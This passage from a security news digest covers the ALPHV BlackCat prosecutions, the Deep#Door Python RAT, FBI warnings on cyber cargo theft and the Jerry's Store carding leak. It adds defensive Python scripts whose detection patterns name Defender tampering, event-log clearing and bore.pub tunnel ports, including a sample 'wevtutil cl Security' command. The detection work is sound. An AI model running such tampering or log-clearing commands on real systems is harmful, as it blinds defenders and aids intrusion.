The FBI said their scheme ran until April 2025. Goldberg admitted to helping launder $1.2M in crypto from a medical firm through mixers and wallets to hide the funds. He claimed debt drove him to join and later feared life imprisonment. After learning the FBI had raided a co-conspirator, Goldberg fled to Paris with his wife. Both he and Martin were indicted on October 2 for extortion and computer damage.

Martin pleaded not guilty, while Goldberg allegedly confessed to the FBI that he was recruited by an unnamed co-conspirator to “ransom some companies” to escape debt. The third individual has not yet been indicted.

Court documents say ALPHV BlackCat hit over 1,000 victims worldwide using a ransomware-as-a-service model. Developers built and maintained the malware and infrastructure, while affiliates targeted high-value victims. After ransom payments, proceeds were shared between developers and affiliates.

“Today’s sentencings show that ransomware criminals can operate anywhere, including right here in the United States, and that the FBI is actively working to track them down and dismantle their networks — wherever they exist,” said Assistant Director Brett Leatherman of the FBI’s Cyber Division. “Goldberg and Martin leveraged their technical skills and cyber security knowledge to extort millions from victims across the U.S., but the FBI’s global reach ensured that they ultimately faced justice. When Goldberg sought to flee abroad and escape prosecution, the FBI tracked him through 10 countries, demonstrating the lengths we will go to hold cyber criminals accountable and protect victims. The FBI thanks our DOJ partners for their help securing today’s outcome.” 

(SecurityAffairs – hacking, DoJ)

New Deep#Door RAT uses stealth and persistence to target Windows

Deep#Door hides a Python RAT inside a batch file, kills Windows defenses, survives via multiple persistence methods, and exfiltrates data through a public TCP tunnel.

Security researchers at Securonix uncovered a sophisticated malware campaign called Deep#Door. Threat actors employed a stealthy Python-based backdoor that uses a surprisingly simple delivery method to achieve deep, persistent access on Windows systems. What makes the campaign stand out is not just what it can do, but how cleverly it avoids being caught doing it.

“Unlike traditional malware loaders that rely on external payload downloads, Deep#Door embeds its Python implant directly inside the dropper script and reconstructs it in-memory and on disk during execution.” reads the report published by Securonix. “The implant then establishes communication with attacker infrastructure hosted on bore[.]pub, a publicly available TCP tunneling service, enabling stealthy remote access without exposing dedicated C2 servers.”

The attack chain starts with a single batch file: install_obf.bat. When executed, this script reads itself, literally parsing its own contents to extract a hidden Python payload embedded directly inside the script. The extracted file, svc.py, is then written quietly to %LOCALAPPDATA%\SystemServices\, a folder name deliberately chosen to blend in with legitimate Windows components.

This self-referential technique is a key reason the malware is hard to catch early. There are no suspicious downloads, no external URLs being contacted at the staging phase, and no compiled executables to flag. It’s all happening within a script that looks, at first glance, like a routine maintenance tool.

Before doing anything else, the loader systematically dismantles the host’s defenses: Windows Defender is disabled, PowerShell logging is turned off, firewall logging is suppressed, and SmartScreen is bypassed. By the time the Python implant activates, the system is effectively blind.

“The malware incorporates numerous advanced anti-analysis and defense evasion mechanisms including sandbox detection, AMSI and ETW patching, ntdll unhooking, Windows Defender tampering, command-line wiping, timestamp stomping, and log clearing.” continues the report.

Deep#Door doesn’t rely on a single method to survive reboots. It plants itself across multiple locations simultaneously: the Windows Startup folder, registry Run keys, scheduled tasks, and even WMI event subscriptions. On top of that, a background watchdog thread constantly monitors these persistence points and automatically restores any that get deleted.

In practice, this means that simply removing one artifact doesn’t clean the infection. All mechanisms need to be addressed at the same time, which makes manual remediation unusually difficult.

Before fully activating, the malware runs a series of checks to determine whether it’s running on a real machine or inside an analysis environment. It looks for debuggers, virtual machine signatures, sandbox indicators like generic usernames or low system resources, and even security research tools like Wireshark or IDA Pro.

If anything looks suspicious, the malware holds back. This helps it evade automated scanning platforms, which typically analyze samples in virtual or sandboxed environments.

For command-and-control, Deep#Door takes an unconventional approach. Instead of connecting to a dedicated attacker server, which would be easier to detect and block, it uses bore.pub, a legitimate public TCP tunneling service.

The malware scans a dynamic range of ports to find an active tunnel, authenticates using a challenge-response mechanism, and establishes a covert channel that looks like ordinary tunneling traffic.

“Instead of relying on a traditional C2 server, the malware leverages bore.pub,” states the cybersecurity firm, “a public TCP tunneling service:

  • Allows attackers to expose internal services to the internet without opening firewall ports
  • Eliminates the need for attacker-owned infrastructure
  • Blends malicious traffic with legitimate tunneling usage

This significantly complicates attribution and network-based detection, as traffic appears to connect to a legitimate service.”

This makes attribution harder and network-based detection less reliable, since the traffic blends with legitimate use of the same service.

Once active, the implant is a fully featured remote access tool. Operators can execute shell commands, capture screenshots, record audio, log keystrokes, access the webcam, harvest stored passwords from browsers, steal SSH keys and cloud credentials, and scan internal networks. At the destructive end, it can also overwrite the Master Boot Record or force a system crash, capabilities that suggest it could shift from espionage to sabotage if needed.

Securonix recommends focusing detection efforts on behavioral signals rather than file signatures: PowerShell commands that reference %~f0 (a self-file marker), file writes to SystemServices directories, modifications to Defender settings or event log services, and outbound connections to bore.pub across ports 41234–41243.
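The behavioral signals listed above map naturally onto a few telemetry checks. The following is an added example, not Securonix’s own detection content: it scores constructed endpoint events (process, file-write, registry and network records in an assumed JSON-like shape) against the four indicator families the report names, and groups hits per host so an analyst sees when several families co-occur. The port range and host name come from the report; the event format, regexes and sample events are assumptions.

```python
"""Behaviour-based triage of endpoint telemetry for the Deep#Door indicators.

Added example (not Securonix's rules). The event shape and every sample event
below are constructed for illustration; only bore.pub and the port range
41234-41243 come from the report.
"""
import re
from typing import Dict, List

BORE_HOST = "bore.pub"
BORE_PORTS = range(41234, 41244)                   # 41234-41243 inclusive
# Batch "self-file" marker that lets a script read its own contents.
SELF_FILE_MARKER = re.compile(r"%~f0", re.IGNORECASE)
# Staging directory used to blend in with Windows components.
SYSTEMSERVICES_PATH = re.compile(r"\\SystemServices\\", re.IGNORECASE)
# Defender / event-log tampering seen in command lines or registry keys.
DEFENSE_TAMPER = re.compile(
    r"Windows Defender|Set-MpPreference|wevtutil\s+cl\b|eventlog", re.IGNORECASE
)


def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator families a single telemetry event matches."""
    hits: List[str] = []
    kind = event.get("type")
    if kind == "process":
        cmd = event.get("cmdline", "")
        if SELF_FILE_MARKER.search(cmd):
            hits.append("self_file_marker")
        if DEFENSE_TAMPER.search(cmd):
            hits.append("defense_tamper")
    elif kind == "file_write":
        if SYSTEMSERVICES_PATH.search(event.get("path", "")):
            hits.append("systemservices_write")
    elif kind == "registry":
        if DEFENSE_TAMPER.search(event.get("key", "")):
            hits.append("defense_tamper")
    elif kind == "network":
        host = event.get("dest_host", "").lower()
        port = int(event.get("dest_port", 0))
        if host == BORE_HOST and port in BORE_PORTS:
            hits.append("bore_tunnel")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Collect distinct indicator families per host; hosts with none are omitted."""
    per_host: Dict[str, set] = {}
    for ev in events:
        families = classify_event(ev)
        if families:
            per_host.setdefault(ev["host"], set()).update(families)
    return {host: sorted(fams) for host, fams in per_host.items()}


# Constructed sample telemetry: WS01 shows the full pattern, WS02 is benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "cmdline": r'cmd.exe /c type "%~f0"'},
    {"type": "file_write", "host": "WS01",
     "path": r"C:\Users\alice\AppData\Local\SystemServices\svc.py"},
    {"type": "registry", "host": "WS01",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware"},
    {"type": "process", "host": "WS01", "cmdline": "wevtutil cl Security"},
    {"type": "network", "host": "WS01", "dest_host": "bore.pub", "dest_port": "41237"},
    {"type": "file_write", "host": "WS02",
     "path": r"C:\Users\bob\AppData\Local\Temp\report.tmp"},
    {"type": "network", "host": "WS02", "dest_host": "updates.example", "dest_port": "443"},
]

if __name__ == "__main__":
    for host, fams in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {len(fams)} indicator families -> {', '.join(fams)}")
```

A single family (one SystemServices write, say) is weak on its own; the per-host grouping is what turns these signals into a useful alert, because the loader, the Defender tampering and the tunnel connection all land on the same machine within minutes.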

“Deep#Door highlights the continued evolution of threat actors toward fileless, script-driven intrusion frameworks that rely heavily on native system components and interpreted languages like Python. By embedding the payload directly within the dropper and extracting it at runtime, the malware significantly reduces external dependencies and limits traditional detection opportunities.” concludes the report.

“The use of public tunneling infrastructure (bore[.]pub) further eliminates the need for dedicated attacker-controlled servers, enabling covert and resilient command-and-control communications that blend with legitimate traffic patterns.”

(SecurityAffairs – hacking, Deep#Door)

Digital attacks drive a new wave of cargo theft, FBI says

The FBI warns of rising cyber cargo theft, with hackers targeting brokers and carriers. Experts say digital attacks are replacing traditional cargo theft.

The FBI has issued a Public Service Announcement (PSA) about a surge in cyber-enabled cargo theft, with hackers increasingly targeting brokers and carriers. This trend confirms earlier findings from Proofpoint and alerts from the NMFTA, which noted that traditional cargo theft is being replaced by more sophisticated, digital attacks across the logistics sector.

“The Federal Bureau of Investigation is publishing this Public Service Announcement (PSA) to warn the public of cyber threat actors increasingly using sophisticated, cyber-enabled tactics to impersonate legitimate businesses to hijack freight, steal high-value shipments, and reroute deliveries, resulting in a surge of strategic cargo theft.” reads the FBI’s PSA.

Crooks are increasingly targeting the U.S. transportation and logistics sector, including brokers and carriers. Since 2024, attackers have used phishing emails, fake websites, and compromised accounts to gain access to systems. They impersonate legitimate companies and post fake load listings to trick victims into handing over goods, which are then diverted and resold.

“Since at least 2024, cyber threat actors have gained unauthorized access to the computer systems of brokers and carriers — typically via spoofed emails, fake URLs, and compromised carrier accounts.” continues the announcement. “The cyber actors pose as victim companies and post fraudulent listings on load boards to deceive shippers, brokers, and carriers into handing over goods, which are redirected from their intended destination and stolen for resale.”

In 2025, cargo theft losses in the U.S. and Canada reached nearly $725 million, up 60% from 2024. Incidents rose 18%, while the average loss per theft increased 36% to $273,990, reflecting a shift toward fewer but higher-value targets.

Cyber-enabled cargo theft follows a structured, multi-step scheme. Attackers first compromise broker or carrier accounts using phishing emails and fake links that install remote access tools. With control of these systems, they impersonate companies and post fake loads on trucking platforms, tricking legitimate carriers into engaging and sometimes infecting them too.

Next, criminals pose as trusted carriers to accept real shipments, then “double-broker” them to unsuspecting drivers while altering documents and delivery details. They may even update official records to appear legitimate.

Finally, the cargo gets redirected, transferred to complicit drivers, and stolen for resale. In some cases, attackers demand ransom to reveal shipment details or location.

The PSA includes indicators to spot cyber-enabled cargo theft attacks. These include unexpected contacts about shipments made in their name without authorization, and emails that mimic real domains but use free providers or slight variations. Messages may push users to click shortened or spoofed links, often tied to fake complaints or documents that deliver malware.

Other red flags include new or suspicious mailbox rules, such as auto-forwarding or deletion. Attackers also use altered email addresses with small changes or added titles. Communication often comes via email or short-lived VoIP phone numbers, sometimes linked to overseas activity.

To prevent cargo theft, businesses should verify shipments using independent and multiple channels before releasing goods. Do not trust names or emails alone—confirm requests with additional authentication. Keep detailed records of drivers, vehicles, and transactions to support investigations and reduce fraud risks.
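The e-mail red flags above (lookalike partner domains, free-mail addresses posing as a known carrier, and inbox rules that forward or delete) are simple enough to check automatically on a broker’s mail gateway or mailbox audit export. This is an added example, not tooling from the FBI PSA: the partner list, the organisation’s own domain, the similarity threshold and the sample headers and rules are all constructed assumptions.

```python
"""Heuristics for the cargo-theft e-mail red flags: lookalike sender domains,
free-mail impersonation of a known partner, and forwarding/deleting inbox rules.

Added example; every list and sample value here is constructed, not from the PSA.
"""
from difflib import SequenceMatcher
from email.utils import parseaddr
from typing import Dict, List, Optional

OUR_DOMAIN = "ourbroker.example"                                   # constructed
KNOWN_PARTNERS = {"acme-freight.example", "bluebridge-logistics.example"}  # constructed
FREE_MAIL = {"gmail.com", "outlook.com", "yahoo.com", "protonmail.com", "hotmail.com"}
LOOKALIKE_THRESHOLD = 0.85   # assumption: tune against your own partner list


def lookalike(domain: str) -> Optional[str]:
    """Return the partner domain that `domain` closely resembles (exact matches excluded)."""
    domain = domain.lower()
    if domain in KNOWN_PARTNERS:
        return None
    best, score = None, 0.0
    for partner in KNOWN_PARTNERS:
        ratio = SequenceMatcher(None, domain, partner).ratio()
        if ratio > score:
            best, score = partner, ratio
    return best if score >= LOOKALIKE_THRESHOLD else None


def check_sender(from_header: str) -> List[str]:
    """Flags for a From: header: near-miss partner domain, or a free-mail address
    whose display name borrows a partner's name."""
    display, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1].lower()
    flags: List[str] = []
    hit = lookalike(domain)
    if hit:
        flags.append(f"lookalike_domain:{hit}")
    if domain in FREE_MAIL:
        for partner in KNOWN_PARTNERS:
            label = partner.split(".")[0].split("-")[0]      # "acme", "bluebridge"
            if label in display.lower():
                flags.append(f"free_mail_impersonation:{partner}")
    return flags


def check_mailbox_rules(rules: List[Dict]) -> List[str]:
    """Names of inbox rules that forward outside the organisation or silently delete mail."""
    flagged: List[str] = []
    for rule in rules:
        forward = rule.get("forward_to", "")
        external = bool(forward) and forward.rsplit("@", 1)[-1].lower() != OUR_DOMAIN
        if external or rule.get("delete"):
            flagged.append(rule["name"])
    return flagged


# Constructed samples: one transposed-letter domain, one free-mail impersonation,
# one genuine partner, plus a mailbox-rule export with two suspicious entries.
SAMPLE_SENDERS = [
    "Dispatch <dispatch@acme-frieght.example>",
    "Acme Freight Dispatch <acme.dispatch@gmail.com>",
    "Dispatch <dispatch@acme-freight.example>",
]
SAMPLE_RULES = [
    {"name": "Archive newsletters", "move_to": "Archive"},
    {"name": "Forward loads", "forward_to": "dispatch.backup@outlook.com"},
    {"name": "Cleanup", "delete": True},
    {"name": "Internal copy", "forward_to": "ops@ourbroker.example"},
]

if __name__ == "__main__":
    for sender in SAMPLE_SENDERS:
        print(f"{sender}: {check_sender(sender) or 'ok'}")
    print("suspicious rules:", check_mailbox_rules(SAMPLE_RULES))
```

The domain check deliberately excludes exact partner matches, so it complements rather than replaces the PSA’s advice to confirm shipment requests out of band: a message from the real partner domain can still come from a compromised account.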

Recently, Proofpoint researchers observed crooks targeting trucking and logistics companies, running coordinated remote access campaigns to steal cargo and divert payments. These attacks appear to be linked to organized crime.

The findings highlight a growing trend of cyber-enabled cargo theft, where digital intrusions directly support real-world crime. This threat is expanding rapidly, with losses in North America reaching $6.6 billion in 2025, showing how cyberattacks are increasingly used to disrupt supply chains and generate profit.

In November 2025, Proofpoint first reported cybercriminals were targeting trucking and logistics firms with RMM tools (remote monitoring and management software) to steal freight. Active since June 2025, the group works with organized crime to loot goods, mainly food and beverages.

Crooks infiltrate logistics firms, hijack cargo bids, and steal goods, fueling the rise of cyber-enabled freight theft.

(SecurityAffairs – hacking, cargo theft)

Carding service Jerry’s Store leak exposes 345,000 stolen payment cards

Jerry’s Store, a card-checking service used by cybercriminals, exposed 345,000 stolen payment cards after leaving its server open, revealing sensitive data.

A cybercriminal operation known as Jerry’s Store has reportedly exposed a large cache of stolen payment card data after leaving its own infrastructure accessible online. The service appears to have been used to test whether stolen credit and debit card details were still valid, effectively acting as a verification tool for fraudsters before the data was resold or abused.

“Jerry’s Store marketplace leaked 345,000 stolen credit card details through an exposed, insecurely configured server created using AI assistance.” reads the report published by CyberNews.

“The leak occurred after Cursor AI generated flawed code without authentication, exposing credit card numbers, names, addresses, and security codes.”

Researchers found that the exposed server contained information linked to roughly 345,000 payment cards. Of those, nearly 200,000 cards had been marked as invalid by the service, while more than 145,000 records were identified as valid. The leaked records reportedly included highly sensitive cardholder data such as card numbers, expiration dates, security codes, names, and billing addresses.

The incident is notable not only because of the volume of exposed data, but also because it shows how organized and automated parts of the carding economy have become. Instead of manually checking stolen cards one by one, criminal marketplaces and fraud services increasingly rely on infrastructure that can validate payment data at scale. Once a card is confirmed as active, it becomes more valuable for resale, fraud attempts, or account takeover activity.

Cybernews estimated that valid stolen card records typically sell for around $7 to $18 on dark web markets. Using that range, the valid card data exposed through Jerry’s Store could be worth between $1 million and $2.6 million. The true value of the broader operation may be higher, since the platform reportedly handled more than just the leaked payment-card records.

CyberNews researchers found that Jerry’s Store operators used Cursor, an AI coding tool by Anysphere, to build their server and admin dashboards. However, flawed guidance from the AI likely led to misconfigurations, leaving the system exposed and causing the data leak.

“We were able to confirm that the leak originated from the user asking to create a statistics dashboard, and Cursor created an unauthenticated open web directory to serve the webpage, ignoring the need to set up authentication or ensure that only the intended dashboard would be accessible,” CyberNews team explained.

[Figure: Jerry’s Store data leak. Source: CyberNews]

The case is ironic: a cybercriminal service built to profit from stolen card data exposed itself due to poor security. This failure creates added risk for victims, as data already circulating in underground markets can spread further, reaching new attackers who did not originally steal it.

The story also highlights a wider trend in cybercrime: illicit services are becoming more productized. Carding shops, validation tools, automated fraud services, and dark web marketplaces increasingly resemble commercial platforms, with pricing models, customer interfaces, and backend infrastructure. Rapid7 has described this broader ecosystem as “carding-as-a-service,” where stolen cards and fraud tooling are packaged for easier use by criminals with varying levels of technical skill.

A similar pattern has been seen in other carding-related incidents. BidenCash, a carding-focused marketplace, became known for releasing large batches of stolen payment-card data as a promotional tactic to attract users and vendors.

Law enforcement has also targeted related ecosystems. In a case involving B1ack’s Stash, authorities seized domains tied to underground vendors trafficking stolen financial data, including payment-card records. That case underlines how carding markets remain a priority for investigators because they support a chain of downstream crimes, from unauthorized purchases to identity theft and money laundering.

Consumers should closely monitor accounts, enable alerts, use virtual cards, and replace compromised ones. Banks must strengthen fraud detection, quickly block stolen cards, and monitor underground markets.

The Jerry’s Store leak shows that even cybercriminal platforms can have weak security. When they fail, the impact still hits ordinary users, whose stolen card data may spread further and be reused, traded, and exploited across the fraud ecosystem.

(SecurityAffairs – hacking, Jerry’s Store)